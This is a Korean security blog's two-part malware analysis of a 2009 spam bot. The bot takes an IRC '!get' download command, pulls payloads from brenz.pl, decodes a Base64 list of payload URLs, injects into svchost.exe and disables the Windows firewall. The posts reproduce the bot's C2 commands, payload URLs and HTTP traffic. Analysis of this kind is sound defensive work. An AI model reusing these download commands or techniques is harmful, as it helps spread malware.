0x02 analysis2009. 6. 22. 13:59

DNS MX 쿼리 증가 및 스팸 메일을 발송하는 악성코드 #1에 이어서 IRC 서버 접속시 다운로드하는 파일들에 대해서 분석해보도록 하겠습니다.


a.php 파일이 실행된 후에는 두개의 파일이 생성되었고 4개의 서비스가 상태가 변경되었습니다.











그리고 brenz.pl에서 a.php를 다운로드하여 실행하면 lometr.pl 사이트에 특정 파일을 요청하는데
hxxp://lometr.pl/mega/lgate.php?n=C022499D00005058 요청시 해당 파일을 실행했던 폴더에 2B.tmp(파일명은 랜덤)라는 파일이 생성되고 이 파일의 내용은 아래와 같습니다.

 MCBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx

Base64로 인코딩되어 있었으며 디코딩하면 다음과 같습니다.

 0 http://brenz.pl/dll/abb.txt 1 http://brenz.pl/met/ge.txt 1

앞서 작성했던 글에서는 암호화되었다고 말씀드렸었는데 제가 제대로 확인을 안했었나 봅니다.
다시 보니 Base64일것 같아 디코딩해보니 URL이 두개가 나오는군요..

이 두개의 파일들은 위에서 보셨던 reader_s.exe와 services.exe 파일과 동일한 파일입니다.
즉, 다운로드 한 후 파일명을 바꿔서 실행을 시키는 것입니다. 파일이 동일하다는 것은 md5sum 해쉬값을 통해서 확인할 수 있었습니다.




두개의 파일을 받은 후에는 엄청난 양의 DNS MX 쿼리가 발생하였고 그로 인해 수많은 프로세스들이 생성되었었습니다.




위 캡쳐화면은 일부에 해당하고 이후에 더 많은 프로세스들이 생성되었었습니다.





a.php 파일을 디버거로 확인해보니 해당 파일 실행시 svchost.exe 프로세스를 생성하고 있었습니다.




0x0040372E에 있는 함수를 실행하면 아래와 같이 svchost.exe 프로세스가 생성만 됩니다.




프로세스 만든 후 메모리에 쓴 후




쓰레드를 재실행합니다.




쓰레드를 재실행하고 나면 다음과 같이 2F.tmp라는 자식 프로세스가 실행되고 이 프로세스에 의해 cmd.exe를 실행하고 윈도우 자체 방화벽 기능을 비활성화시키는 명령을 실행합니다. 그리고 services.exe라는 프로세스를 또 실행시키죠..




결국 brenz.pl에서 다운받은 a.php는 reader_s.exe(/dll/abb.txt)와 services.exe(/met/ge.txt)를 다운로드하여 실행하기 위함인 것을 알 수 있습니다.

지금까지 분석했던 내용을 도식화해보면 다음과 같습니다.




/dll/abb.txt에 의해 생성되는 reaser_s.exe가 스팸 메일을 다량으로 발송하는 프로세스였고
/met/ge.txt에 의해 생성되는 services.exe가 방화벽 기능과 같은 서비스들을 중지시키는 기능을 하고 있었습니다.



분석했던 3개의 파일(a.php, abb.txt, ge.txt)에 대한 바이러스토탈 결과입니다.

a.php : http://www.virustotal.com/ko/analisis/9cf7dfad11887fa34b7bd0eefc70909d9954e3dab3725c8f2800775826305c5f-1245646438
abb.txt : http://www.virustotal.com/ko/analisis/158dd590159ba699318ac8b8d92845a2a12649d0a8454c0ddb513b87a2774c6a-1245646516
ge.txt : http://www.virustotal.com/ko/analisis/652fa9658c088e9761daf5eed8eb40d64d93e5821cb91fa389c6bf98f869424f-1245646559


국내 백신 프로그램들은 대부분 탐지를 하고 있어서 백신 업데이트가 잘 이루어지고 있다면 크게 문제될 것이 없는 듯 보입니다.
대부분이라고 한 것은 일부 악성코드를 일부 백신 프로그램이 아직 탐지를 못하고 있어서입니다. 자세한건 위 링크를 참조하시면 되겠습니다.



www.upononjob.cn이나 horobl.cn이라는 도메인도 패킷 캡쳐시 잡혔었는데 www.upononjob.cn으로 접속시 horobl.cn으로 리다이렉션 되고 있었고
horobl.cn은 접속이 되지 않아 특별히 다른 행동을 하지 않는 것으로 보입니다.
접속이 안된다기 보다는 DNS 질의시 response가 없는 것으로 보아 도메인에 대한 IP가 없는 것으로 보입니다.





Posted by demantos
0x02 analysis2009. 6. 19. 15:58

해당 악성코드는 아직 분석 중인데 급히 차단해야 할 도메인이 있어 분석 도중 포스팅합니다.

해당 악성코드를 실행하면 proxima.ircgalaxy.pl로 접속합니다.




IRC 서버로 유명한 녀석이죠..

재수 좋았던건지는 모르겠지만 봇 마스터를 다른 사이트에서 파일을 다운로드하라고 명령을 내리더군요

NICK kwfqkmyt
USER d020501 . . :_Service Pack 3
JOIN &virtu
:u. PRIVMSG kwfqkmyt :!get
http://brenz.pl/ex/a.php

다운로드하는 파일은 exe 파일이었습니다.




그리고 나서 lometr.pl에 접속해서 /mega/lgate.php?n=5B3590E0FB840577 를 요청하고 brenz.pl에서 /dll/abb.txt 파일과 /met/ge.txt 파일을 다운로드하였습니다.






lometr.pl에 요청한 파일에 대한 결과는 암호화된 내용이라 어떤 내용인지 확인을 하지 못했습니다.

GET /mega/lgate.php?n=5B3590E0FB840577 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: lometr.pl
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Jun 2009 01:39:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Content-Length: 80
 
MSBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx


추가적으로 www.upononjob.cn에서 특정 파일에 접근하고 나서 또 다른 도메인으로 리다이렉션되고 있었습니다.



GET /in.cgi?0032 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 19 Jun 2009 01:39:29 GMT
Content-Type: text/html
Connection: close
Set-Cookie: SL_0032_0000=_1_; domain=www.upononjob.cn; path=/; expires=Sun, 19-Jul-2009 01:39:28 GMT
Set-Cookie: TSUSER=0032; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=www.upononjob.cn
 
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://horobl.cn/index.html'">
</head>
<body>
document moved <a href="
http://horobl.cn/index.html">here</a>
</body>
</html>


보시는 것과 같이 horobl.cn으로 리다이렉션되는데 연결도 안되고 DNS에서 쿼리를 날려봐도 IP가 나오지 않았습니다.
악성코드 제작자가 실수한걸까요? ㅋ

이렇게 몇개의 도메인에 접속하고 파일 받고 하는 과정에서 몇개의 IP와도 특정 데이터를 송수신하고 있었는데 모두 암호화되어 있어서 확인을 못했습니다.
그리고 이후에는 루트 네임서버로 hotmail.com, gmail.com, web.de, aol.com, yahoo.com의 MX 레코드를 질의하더니 조금 후에는 랜덤한 DNS로 랜덤한 도메인에 대한 MX 레코드값을 질의하고 있었습니다.

질의 후에는 메일서버를 통해 스팸메일로 보이는 메일을 다량으로 보내고 있었습니다.





추가 도메인에서 받은 파일은 내일 분석해볼 생각입니다. ^^





Posted by demantos